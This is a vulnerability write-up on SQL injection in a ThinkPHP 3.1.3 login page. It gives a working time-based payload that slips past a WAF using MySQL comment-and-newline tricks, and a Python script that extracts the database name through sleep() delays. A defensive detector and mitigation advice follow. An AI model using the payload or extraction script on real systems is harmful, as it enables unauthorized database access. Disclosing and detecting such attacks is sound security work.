ThinkPHP 3.1.3 WAF bypass SQL injection

This vulnerability was found during a crowdsourced test. I first noticed the site ran the ThinkPHP 3.1.3 framework, tried turning a parameter into array form, and got back a SQL error; after that I worked on bypassing the WAF.

URL: http://**/console/

The login page is vulnerable to SQL injection.

Vulnerable URL: http://**/console/Admin/Index/Login.shtml

1. The account parameter is vulnerable to SQL injection, and the WAF can be bypassed with #a%0a (a MySQL # comment terminated by a newline). The following payload causes a 10-second delay, confirming the injection:

account[]=exp&account[1]=))#a%0aunion(#a%0aselect#a%0a(#a%0aselect#a%0asleep#a%0a(10))#a%0afrom#a%0a(select#a%0asleep#a%0a(10))a)#

2. Script to extract the database name:

import requests
import time

u = "http://**/console/Admin/Index/Login.shtml"

# Candidate characters for each position; only lowercase is needed because
# the injected condition compares lower(mid(database(), i, 1)).
strs = "abcdefghijklmnopqrstuvwxyz0123456789_"

headers = {
    "Cookie": "PHPSESSID=xxx"
}

sess = requests.session()
sess.headers = headers

# Database name recovered so far
xixi = ""

def check(i, s, times=1):
    """Return True if character s at position i of database() makes the server sleep.

    A positive result is re-checked once (times == 2) to rule out a slow response
    caused by network latency rather than by sleep().
    """
    t1 = time.time()
    data = {
        "account[]": "exp",
        "account[1]": "))union#a\n(select#a\n(1)from#a\n(select if#a\n(lower((mid((database()),"+str(i)+",1)))='"+s+"',sleep#a\n(4),0))a)#",
        "password[]": "6a",
        "verify": "6677",
    }
    print(s)
    r = sess.post(u, data=data, proxies={"http": "http://127.0.0.1:8080/"})
    t = time.time() - t1
    if t > 4:
        if times == 1:
            return check(i, s, times + 1)
        return True
    return False

# Positions are 1-based for MySQL mid(); stop once a position matches no character.
for i in range(len(xixi) + 1, 50):
    for s in strs:
        if check(i, s) == True:
            xixi = xixi + s
            print(xixi)
            break
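The two things this write-up relies on are worth turning into a detection check: ThinkPHP 3.x treats a parameter whose first array element is the string "exp" as a raw SQL expression, and the `#a%0a` trick hides SQL keywords from a WAF behind a MySQL `#` comment ended by a newline. The following Python is an added example (not code from the original post or from ThinkPHP) that a defender could run over request bodies in a log pipeline or in a pre-controller filter: it flags array values supplied for fields that should be scalars, the `exp` operator, the comment-plus-newline pattern, and any SQL keyword that becomes visible once those comments are stripped. The field names and the sample bodies are constructed for the example; the keyword list is deliberately small and is an assumption you would tune for your own application.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample bodies (application/x-www-form-urlencoded), not captured traffic.
# [0] is a normal login, [1] is a union-style probe, [2] is a time-based probe.
SAMPLE_BODIES = [
    "account=admin&password=secret&verify=1234",
    "account[]=exp&account[1]=))%23a%0aunion(%23a%0aselect%23a%0a(1))%23&password[]=6a&verify=6677",
    "account[]=exp&account[1]=))union%23a%0a(select%23a%0a(1)from%23a%0a"
    "(select+if%23a%0a(1,sleep%23a%0a(4),0))a)%23&password[]=6a&verify=6677",
]

# A MySQL '#' comment runs to the end of the line, so '#anything<newline>' is
# dropped by the database but splits keywords as far as a naive WAF is concerned.
COMMENT_NEWLINE = re.compile(r"#[^\n\r]*[\n\r]+")

# Small, assumed keyword list; extend it for the application being protected.
SQL_KEYWORDS = re.compile(r"\b(union|select|sleep|benchmark|from)\b", re.IGNORECASE)


def normalize(value):
    """URL-decode a value and collapse '#...<newline>' comments into single spaces.

    This is the view the database will actually parse, so keyword matching is
    done on this form rather than on the raw parameter.
    """
    decoded = unquote_plus(value)
    stripped = COMMENT_NEWLINE.sub(" ", decoded)
    return re.sub(r"\s+", " ", stripped).strip()


def parse_body(body):
    """Split a form-encoded body into URL-decoded (key, value) pairs, keeping order."""
    pairs = []
    for part in body.split("&"):
        if not part:
            continue
        key, _, value = part.partition("=")
        pairs.append((unquote_plus(key), unquote_plus(value)))
    return pairs


def analyze_body(body, scalar_fields=("account", "password", "verify")):
    """Return a sorted list of 'finding:field' strings for one request body.

    scalar_fields lists parameters the application expects as plain strings;
    any 'field[...]' form for them is suspicious because the framework will
    hand the controller an array instead of a string.
    """
    findings = set()
    first_value = {}  # field -> first array element (ThinkPHP reads it as the operator)
    for key, value in parse_body(body):
        field, bracket, _ = key.partition("[")
        if bracket and field in scalar_fields:
            findings.add("array_param:" + field)
            first_value.setdefault(field, value)
        if COMMENT_NEWLINE.search(value):
            findings.add("comment_bypass:" + field)
        if SQL_KEYWORDS.search(normalize(value)):
            findings.add("sql_keyword:" + field)
    for field, value in first_value.items():
        if value.strip().lower() == "exp":
            findings.add("exp_operator:" + field)
    return sorted(findings)


if __name__ == "__main__":
    for body in SAMPLE_BODIES:
        print(body[:60], "->", analyze_body(body) or "clean")
```

The cheapest mitigation in the application itself is the `array_param` check: reject or stringify any array supplied for a field that the login code expects to be a scalar before it reaches the query builder, since that alone removes the `exp` path regardless of how the rest of the payload is obfuscated. The `comment_bypass` and `sql_keyword` findings are useful as log-side detections for the same probes.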